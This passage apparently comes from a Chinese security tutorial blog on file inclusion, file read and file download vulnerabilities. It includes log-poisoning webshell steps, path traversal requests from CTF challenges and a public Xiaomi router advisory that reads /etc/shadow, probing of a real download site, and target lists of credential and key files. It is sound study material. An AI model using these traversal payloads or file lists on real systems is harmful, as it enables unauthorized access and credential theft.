<h4 id="2-5-1-Apache-错误日志文件-getshell"><a href="#2-5-1-Apache-错误日志文件-getshell" class="headerlink" title="2.5.1 Apache 错误日志文件 getshell"></a>2.5.1 Apache 错误日志文件 getshell</h4><p><strong>phpstudy2016(Apache)+Win2003</strong></p>
<blockquote>
<p>D:\phpStudy\Apache\logs\error.log</p>
</blockquote>
<p><strong>构造一句话木马写入 Apache日志文件当中</strong><br><img src="https://i.loli.net/2021/06/06/tRi7pVXsmoD3FGb.png" alt="在这里插入图片描述"><img src="https://i.loli.net/2021/06/06/7Wibc8HMSTa2wnL.png" alt="在这里插入图片描述"></p>
<p><strong>访问</strong></p>
<p><img src="https://i.loli.net/2021/06/06/a6im4kHOnDxGTgl.png" alt="在这里插入图片描述"></p>
<p><strong>蚁剑连接</strong></p>
<p><img src="https://i.loli.net/2021/06/06/34l7JGxMkEKY68V.png" alt="在这里插入图片描述"></p>
<p><strong>phpstudy小皮面板(Apache)+Win10</strong></p>
<blockquote>
<p>D:\phpstudy_pro\Extensions\Apache2.4.39\logs</p>
</blockquote>
<p><img src="https://i.loli.net/2021/06/06/zmopQn46y7eGaD2.png" alt="image-20210415200828715"></p>
<p><img src="C:\Users\yinanping\AppData\Roaming\Typora\typora-user-images\image-20210415202541715.png" alt="image-20210415202541715"></p>
<h4 id="2-5-2-session-文件包含"><a href="#2-5-2-session-文件包含" class="headerlink" title="2.5.2 session 文件包含"></a>2.5.2 session 文件包含</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">session_start();</span><br><span class="line"><span class="variable">$ctfs</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;ctfs&#x27;</span>];</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&quot;username&quot;</span>]=<span class="variable">$ctfs</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果存在本地文件包含漏洞，就可以通过ctfs写入恶意代码到session文件中，然后通过文件包含漏洞执行此恶意代码getshell。</p>
<h3 id="2-6-任意目录遍历"><a href="#2-6-任意目录遍历" class="headerlink" title="2.6 任意目录遍历 ../../"></a>2.6 任意目录遍历 <code>../../</code></h3><p><strong>防御：</strong><code>php.ini</code> 当中的配置 <code>open_basedir</code> ，将很好可以设置用户需要执行的文件目录，如果设置目录的话，PHP仅仅在该目录内搜索文件。而没有设置open_basedir时，文件包含漏洞可以访问任意文件。</p>
<p>经查看之后，各个版本的php该配置默认如下：</p>
<p><img src="https://i.loli.net/2021/06/06/o1q26TgN9bXkZSx.png" alt="image-20210415203241871"></p>
<p>修改配置，只允许用户包含指定目录下的文件</p>
<p><img src="https://i.loli.net/2021/06/06/vmLCkaI6n7BijH1.png" alt="image-20210415204112127"></p>
<p>再次尝试包含非指定目录下的文件</p>
<p><img src="C:\Users\yinanping\AppData\Roaming\Typora\typora-user-images\image-20210415204235730.png" alt="image-20210415204235730"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#各种语言文件包含</span></span><br><span class="line"><span class="comment">#ASP ASPX PHP JSP Python Javaweb</span></span><br><span class="line">&lt;c:import url=<span class="string">&quot;http://...&quot;</span>&gt;</span><br><span class="line">&lt;jsp:include page=<span class="string">&quot;head.jsp&quot;</span>/&gt;</span><br><span class="line">&lt;%@ include file=<span class="string">&quot;head.jsp&quot;</span>%&gt;</span><br><span class="line">&lt;?php include (<span class="string">&#x27;test.php&#x27;</span>) ?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="3-漏洞防御"><a href="#3-漏洞防御" class="headerlink" title="3. 漏洞防御"></a>3. 漏洞防御</h2><ul>
<li>严格限制包含中的参数，取消那些不可控的参数。</li>
<li>开启open_basedir 配置，将其设置为指定目录，则只有该目录的文件允许被访问</li>
<li>如果不需要文件包含，则关闭allow_url_include()函数，防止远程文件包含</li>
<li>固定后缀</li>
<li>固定文件</li>
<li>WAF 产品</li>
</ul>
<p>检测：</p>
<ul>
<li>白盒：代码审计</li>
<li>黑盒：漏扫工具，公开漏洞，手工查看参数以及功能点</li>
</ul>
<p>利用：</p>
<ul>
<li>http</li>
<li>ftp <a href="ftp://username:password@192.168.0.1/profile">ftp://username:password@192.168.0.1:21/profile</a></li>
<li>file</li>
<li>各种脚本支持的协议</li>
</ul>
<h1 id="二、文件读取漏洞–显示源代码"><a href="#二、文件读取漏洞–显示源代码" class="headerlink" title="二、文件读取漏洞–显示源代码"></a>二、文件读取漏洞–显示源代码</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>            </span><br><span class="line"><span class="variable">$filename</span>=”test.txt”;</span><br><span class="line">readfile(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">   <span class="comment">#输出文件内容</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$filename</span>=”test.txt”;</span><br><span class="line"><span class="keyword">echo</span> file_get_contents(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    <span class="comment">#将整个文件读入一个字符串</span></span><br></pre></td></tr></table></figure>

<p><strong>相关函数：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">readfile()</span><br><span class="line">file_get_contents()</span><br><span class="line">fopen()</span><br><span class="line">变量：<span class="variable">$filename</span></span><br></pre></td></tr></table></figure>

<h2 id="2-1-百度杯2017二月-Zone真题复现"><a href="#2-1-百度杯2017二月-Zone真题复现" class="headerlink" title="2.1 百度杯2017二月-Zone真题复现"></a>2.1 百度杯2017二月-Zone真题复现</h2><p><a target="_blank" rel="noopener" href="https://www.ichunqiu.com/battalion?t=1&r=57475">网址</a></p>
<p>分别抓包，修改参数 <code>login=1</code> 试试</p>
<p><img src="https://i.loli.net/2021/06/06/9PtsoLqbQjHOp8N.png" alt="image-20210416220034033"></p>
<p><img src="https://i.loli.net/2021/06/06/IcqNsdGBAlmR1Fp.png" alt="image-20210416220138595"></p>
<p>发现修改 <code>Mini-Zone </code> 数据包当中的 <code>login=1</code> 之后成功进入管理员的界面</p>
<p>对 <code>manage</code>  再抓包，修改 <code>login=1</code> ，获取 <code>/manages/admin.php?module=index&amp;name=php</code> 。</p>
<p>mvc架构</p>
<p>读取nginx配置文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /manages/admin.php?module=..././..././..././etc/nginx/nginx.conf&amp;name= HTTP/1.1</span><br></pre></td></tr></table></figure>

<p>获得返回200</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Date: Fri, 16 Apr 2021 14:13:40 GMT</span><br><span class="line">Content-Type: text/html; charset=UTF-8</span><br><span class="line">Connection: close</span><br><span class="line">Vary: Accept-Encoding</span><br><span class="line">content-text: text/html;charset=gbk</span><br><span class="line">X-Via-JSL: 38ae086,-</span><br><span class="line">X-Cache: bypass</span><br><span class="line">Content-Length: 2708</span><br><span class="line"></span><br><span class="line">						</span><br><span class="line">#user  nobody;</span><br><span class="line">worker_processes  1;</span><br><span class="line"></span><br><span class="line">#error_log  logs/error.log;</span><br><span class="line">#error_log  logs/error.log  notice;</span><br><span class="line">#error_log  logs/error.log  info;</span><br><span class="line"></span><br><span class="line">#pid        run/nginx.pid;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">events &#123;</span><br><span class="line">    worker_connections  1024;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">http &#123;</span><br><span class="line">    include       mime.types;</span><br><span class="line">    default_type  application/octet-stream;</span><br><span class="line"></span><br><span class="line">    #log_format  main  &#x27;$remote_addr - $remote_user [$time_local] &quot;$request&quot; &#x27;</span><br><span class="line">    #                  &#x27;$status $body_bytes_sent &quot;$http_referer&quot; &#x27;</span><br><span class="line">    #                  &#x27;&quot;$http_user_agent&quot; &quot;$http_x_forwarded_for&quot;&#x27;;</span><br><span class="line"></span><br><span class="line">    #access_log  logs/access.log  main;</span><br><span class="line"></span><br><span class="line">    sendfile        on;</span><br><span class="line">    #tcp_nopush     on;</span><br><span class="line"></span><br><span class="line">    #keepalive_timeout  0;</span><br><span class="line">    keepalive_timeout  65;</span><br><span class="line"></span><br><span class="line">    #gzip  on;</span><br><span class="line"></span><br><span class="line">    #server &#123;</span><br><span class="line">    #    listen       80;</span><br><span class="line">    #    server_name  localhost;</span><br><span class="line"></span><br><span class="line">        #charset koi8-r;</span><br><span class="line"></span><br><span class="line">        #access_log  logs/host.access.log  main;</span><br><span class="line"></span><br><span class="line">    #    location / &#123;</span><br><span class="line">    #        root   html;</span><br><span class="line">    #        index  index.html index.htm;</span><br><span class="line">    #    &#125;</span><br><span class="line"></span><br><span class="line">        #error_page  404              /404.html;</span><br><span class="line"></span><br><span class="line">        # redirect server error pages to the static page /50x.html</span><br><span class="line">        #</span><br><span class="line">    #    error_page   500 502 503 504  /50x.html;</span><br><span class="line">    #    location = /50x.html &#123;</span><br><span class="line">    #        root   html;</span><br><span class="line">    #    &#125;</span><br><span class="line"></span><br><span class="line">        # proxy the PHP scripts to Apache listening on 127.0.0.1:80</span><br><span class="line">        #</span><br><span class="line">        #location ~ \.php$ &#123;</span><br><span class="line">        #    proxy_pass   http://127.0.0.1;</span><br><span class="line">        #&#125;</span><br><span class="line"></span><br><span class="line">        # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000</span><br><span class="line">        #</span><br><span class="line">        #location ~ \.php$ &#123;</span><br><span class="line">        #    root           html;</span><br><span class="line">        #    fastcgi_pass   127.0.0.1:9000;</span><br><span class="line">        #    fastcgi_index  index.php;</span><br><span class="line">        #    fastcgi_param  SCRIPT_FILENAME  /scripts$fastcgi_script_name;</span><br><span class="line">        #    include        fastcgi_params;</span><br><span class="line">        #&#125;</span><br><span class="line"></span><br><span class="line">        # deny access to .htaccess files, if Apache&#x27;s document root</span><br><span class="line">        # concurs with nginx&#x27;s one</span><br><span class="line">        #</span><br><span class="line">        #location ~ /\.ht &#123;</span><br><span class="line">        #    deny  all;</span><br><span class="line">        #&#125;</span><br><span class="line">    #&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    # another virtual host using mix of IP-, name-, and port-based configuration</span><br><span class="line">    #</span><br><span class="line">    #server &#123;</span><br><span class="line">    #    listen       8000;</span><br><span class="line">    #    listen       somename:8080;</span><br><span class="line">    #    server_name  somename  alias  another.alias;</span><br><span class="line"></span><br><span class="line">    #    location / &#123;</span><br><span class="line">    #        root   html;</span><br><span class="line">    #        index  index.html index.htm;</span><br><span class="line">    #    &#125;</span><br><span class="line">    #&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    # HTTPS server</span><br><span class="line">    #</span><br><span class="line">    #server &#123;</span><br><span class="line">    #    listen       443 ssl;</span><br><span class="line">    #    server_name  localhost;</span><br><span class="line"></span><br><span class="line">    #    ssl_certificate      cert.pem;</span><br><span class="line">    #    ssl_certificate_key  cert.key;</span><br><span class="line"></span><br><span class="line">    #    ssl_session_cache    shared:SSL:1m;</span><br><span class="line">    #    ssl_session_timeout  5m;</span><br><span class="line"></span><br><span class="line">    #    ssl_ciphers  HIGH:!aNULL:!MD5;</span><br><span class="line">    #    ssl_prefer_server_ciphers  on;</span><br><span class="line"></span><br><span class="line">    #    location / &#123;</span><br><span class="line">    #        root   html;</span><br><span class="line">    #        index  index.html index.htm;</span><br><span class="line">    #    &#125;</span><br><span class="line">    #&#125;</span><br><span class="line">    include  sites-enabled/default;//包含文件</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /manages/admin.php?module=..././..././..././etc/nginx/sites-enabled/default&amp;name= HTTP/1.1</span><br></pre></td></tr></table></figure>

<p>所获取到的内容有</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">location /online-movies &#123;</span><br><span class="line">           alias /movie/;</span><br><span class="line">           autoindex on;</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure>

<p>继续构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /online-movies../var/www/html/flag.php  HTTP/1.1</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/ReYczFwK9ynPWig.png" alt="image-20210416222305438"></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/kostart123/article/details/81223189?utm_source=blogkpcl4">参考</a></p>
<h2 id="2-2-小米路由器远程任意文件读取"><a href="#2-2-小米路由器远程任意文件读取" class="headerlink" title="2.2 小米路由器远程任意文件读取"></a>2.2 小米路由器远程任意文件读取</h2><p><a target="_blank" rel="noopener" href="https://www.seebug.org/vuldb/ssvid-98122">小米路由器远程任意文件读取</a></p>
<p><a target="_blank" rel="noopener" href="https://fofa.so/result?qbase64=5bCP57Gz6Lev55Sx5Zmo">Fofa搜索</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.31.1/api-third-party/download/extdisks../etc/shadow</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/Q2gfFwHPAX9qupz.png" alt="image-20210416223124397"></p>
<h1 id="三、文件下载漏洞–文件被下载"><a href="#三、文件下载漏洞–文件被下载" class="headerlink" title="三、文件下载漏洞–文件被下载"></a>三、文件下载漏洞–文件被下载</h1><ul>
<li><p>一般文件：后台首页日志等可见文件</p>
</li>
<li><p>敏感文件：</p>
<ul>
<li>配置文件（数据库，平台，）</li>
<li>各种接口文件</li>
<li>密钥信息等文件</li>
</ul>
</li>
<li><p><strong>文件下载方式：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=”http:<span class="comment">//www.a.com/xxx.rar”&gt;下载&lt;/a&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;h1&gt;讲开始下载文件！&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line">    header(<span class="string">&#x27;Content-Type: imgage/jpeg&#x27;</span>);</span><br><span class="line">    header(<span class="string">&#x27;Content-Disposition: attachment; filename=&#x27;</span>.<span class="variable">$filename</span>);</span><br><span class="line">    header(<span class="string">&#x27;Content-Lengh: &#x27;</span>.filesize(<span class="variable">$filename</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="3-1-Pikachu-之-Insafe-Filedownload-—-参数值-filename"><a href="#3-1-Pikachu-之-Insafe-Filedownload-—-参数值-filename" class="headerlink" title="3.1 Pikachu 之 Insafe Filedownload — 参数值--?filename="></a>3.1 Pikachu 之 Insafe Filedownload — <code>参数值--?filename=</code></h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker build -t &quot;pikachu&quot; .</span><br><span class="line">docker run -d -p8080:80 pikachu</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#图片所在位置</span></span><br><span class="line">http://pikachu/vul/unsafedownload/download/ai.png</span><br><span class="line"><span class="comment">#下载图片链接</span></span><br><span class="line">pikachu/vul/unsafedownload/execdownload.php?filename=ai.png</span><br><span class="line"></span><br><span class="line"><span class="comment">#得知 download/ 和 execdownload.php 在 unsafedownload/目录下</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#尝试下载 execdownload.php</span></span><br><span class="line">pikachu/vul/unsafedownload/execdownload.php?filename=../execdownload.php</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/9gNbeQPLd6tnR8Y.png" alt="image-20210416103358950"></p>
<p>下载成功</p>
<p>我们继续根据 execdownload.php 这个文件当中的内容获取一些文件的路径，进而继续下载，发现 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">include_once $PIKA_ROOT_DIR.&quot;inc/function.php&quot;;</span><br><span class="line">$file_path=&quot;download/&#123;$_GET[&#x27;filename&#x27;]&#125;&quot;;</span><br></pre></td></tr></table></figure>

<p>尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://pikachu/vul/unsafedownload/execdownload.php?filename=../../../inc/function.php</span><br></pre></td></tr></table></figure>

<p>成功下载</p>
<p><strong>工具扫描配置文件 ：config.inc.php 获取数据库账户密码等配置信息</strong></p>
<p><img src="https://i.loli.net/2021/06/06/wTDhREYW9raUn3q.png" alt="image-20210416113015851"></p>
<h2 id="3-2-znds-网站-–-功能点"><a href="#3-2-znds-网站-–-功能点" class="headerlink" title="3.2 znds 网站 – 功能点"></a>3.2 znds 网站 – <code>功能点</code></h2><p><a target="_blank" rel="noopener" href="https://www.znds.com/">znds</a></p>
<p>随便下载一款软件，右键 <code>复制下载链接</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#下载好的文件名：</span></span><br><span class="line">    xxpt_1.<span class="number">0.5</span>_dangbei.apk</span><br><span class="line"><span class="comment">#下载链接： </span></span><br><span class="line">    http:<span class="comment">//down.znds.com/getdownurl/?s=L2Rvd24vMjAxODExMjAveHhwdF8xLjAuNV9kYW5nYmVpLmFwaw==</span></span><br><span class="line"><span class="comment">#加密部分：</span></span><br><span class="line">	/down/<span class="number">20181120</span>/xxpt_1.<span class="number">0.5</span>_dangbei.apk</span><br><span class="line"><span class="comment">#清晰的URL：</span></span><br><span class="line">    http:<span class="comment">//down.znds.com/getdownurl/?s=/down/20181120/xxpt_1.0.5_dangbei.apk</span></span><br></pre></td></tr></table></figure>

<p><strong>信息收集，获取网站脚本类型，使用相应的脚本文件去扫描/下载</strong></p>
<p>示例：记得加密</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">尝试下载其它文件：</span><br><span class="line">http://down.znds.com/getdownurl/index.php/?s=index.php</span><br><span class="line">对应加密：</span><br><span class="line">http://down.znds.com/getdownurl/?s=aW5kZXgucGhw</span><br></pre></td></tr></table></figure>

<h2 id="3-3-RoarCTF2019-文件读取真题复现-–-JAVAWEB"><a href="#3-3-RoarCTF2019-文件读取真题复现-–-JAVAWEB" class="headerlink" title="3.3 RoarCTF2019-文件读取真题复现 – JAVAWEB"></a>3.3 RoarCTF2019-文件读取真题复现 – JAVAWEB</h2><p><a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#%5BRoarCTF%202019%5DEasy%20java">RoarCTF2019-文件读取真题复现</a></p>
<p>对 <code>help</code> 右键 <code>复制链接地址</code> ，发现是 文件下载</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://0e351c4c-e667-4d71-8086-639b36d07883.node3.buuoj.cn/Download?filename=help.docx</span><br></pre></td></tr></table></figure>

<p>将 filename 参数使用 post 传递，发现可下载 <code>help.docx</code></p>
<p><img src="https://i.loli.net/2021/06/06/FtEn59ZComH3yjQ.png" alt="image-20210416121428172"></p>
<p><img src="https://i.loli.net/2021/06/06/xOwvqE3ZpmLoD8u.png" alt="image-20210416121458449"></p>
<p>很显然，是耍你的</p>
<p>Java开发 当中的一个 经常使用的配置文件 <code>WEB-INF/web.xml</code>，会记录许多信息，尝试下载</p>
<p><img src="https://i.loli.net/2021/06/06/NAV1aX5RgYbvziw.png" alt="image-20210416122057285"></p>
<p><img src="https://i.loli.net/2021/06/06/oR1MgfS46UjmDvt.png" alt="image-20210416122406641"></p>
<p>发现含有 Flag文件，尝试下载 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://0e351c4c-e667-4d71-8086-639b36d07883.node3.buuoj.cn/Flag</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/fr6YQiKVB7qp5Fl.png" alt="image-20210416122631034"></p>
<p>显然，路径不正确</p>
<p>实际上 关键点在于 ，JAVA开发过程中，其文件是储存在它的控制器当中的，路径如下：因为Java字节码类文件（<code>.class</code>）是Java编译器编译Java源文件（<code>.java</code>）产生的“目标文件”。最终得出flag的关键文件位置为：<code>/WEB-INF/classes/com/wm/ctf/FlagController.class</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">filename=WEB-INF/classes/com/wm/ctf/FlagController.class</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/06/yI8CPVnWKeTUt7k.png" alt="image-20210416122938735"></p>
<p><img src="https://i.loli.net/2021/06/06/iHBaV47crbIFKRd.png" alt="image-20210416123133676"></p>
<h1 id="四、总结"><a href="#四、总结" class="headerlink" title="四、总结"></a>四、总结</h1><p><strong>参数发现：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">read.xxx?filename</span><br><span class="line">down.xxx?filename</span><br><span class="line">readfile</span><br><span class="line">downfile</span><br><span class="line">&amp;readpath</span><br><span class="line">&amp;filepath</span><br><span class="line">&amp;inputfile</span><br><span class="line">&amp;url</span><br><span class="line">&amp;data</span><br><span class="line">&amp;readfile</span><br><span class="line">&amp;menu</span><br><span class="line">META-INF</span><br><span class="line">WEB-INF</span><br><span class="line">&amp;RealPath=</span><br><span class="line">&amp;FilePath=</span><br><span class="line">&amp;ﬁlepath=</span><br><span class="line">&amp;Path=</span><br><span class="line">&amp;path=</span><br><span class="line">&amp;inputFile=</span><br><span class="line">&amp;url=</span><br><span class="line">&amp;urls=</span><br><span class="line">&amp;Lang=</span><br><span class="line">&amp;dis=</span><br><span class="line">&amp;data=</span><br><span class="line">&amp;readﬁle=</span><br><span class="line">&amp;ﬁlep=</span><br><span class="line">&amp;src=</span><br><span class="line">&amp;menu=</span><br><span class="line">META-INF</span><br><span class="line">WEB-INF</span><br></pre></td></tr></table></figure>

<p><strong>Windows 敏感信息：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">C:\boot.ini //查看系统版本</span><br><span class="line">C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件</span><br><span class="line">C:\Windows\repair\sam //存储系统初次安装的密码</span><br><span class="line">C:\Program Files\mysql\my.ini //Mysql配置</span><br><span class="line">C:\Program Files\mysql\data\mysql\user.MYD //Mysql root</span><br><span class="line">C:\Windows\php.ini //php配置信息</span><br><span class="line">C:\Windows\my.ini //Mysql配置信息 </span><br></pre></td></tr></table></figure>

<p><strong>Linux 敏感信息：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/root/.ssh/authorized_keys</span><br><span class="line">/root/.ssh/id_rsa</span><br><span class="line">/root/.ssh/id_ras.keystore</span><br><span class="line">/root/.ssh/known_hosts</span><br><span class="line">/etc/passwd</span><br><span class="line">/etc/shadow</span><br><span class="line">/etc/my.cnf</span><br><span class="line">/etc/httpd/conf/httpd.conf</span><br><span class="line">/root/.bash_history</span><br><span class="line">/root/.mysql_history</span><br><span class="line">/proc/self/fd/fd[0-9]*(文件标识符)</span><br><span class="line">/proc/mounts</span><br><span class="line">/porc/config.gz </span><br></pre></td></tr></table></figure>

<p><strong>利用思路：</strong></p>
<blockquote>
<ul>
<li>下载常规的配置文件，例如: ssh,weblogic,ftp,mysql等相关配置</li>
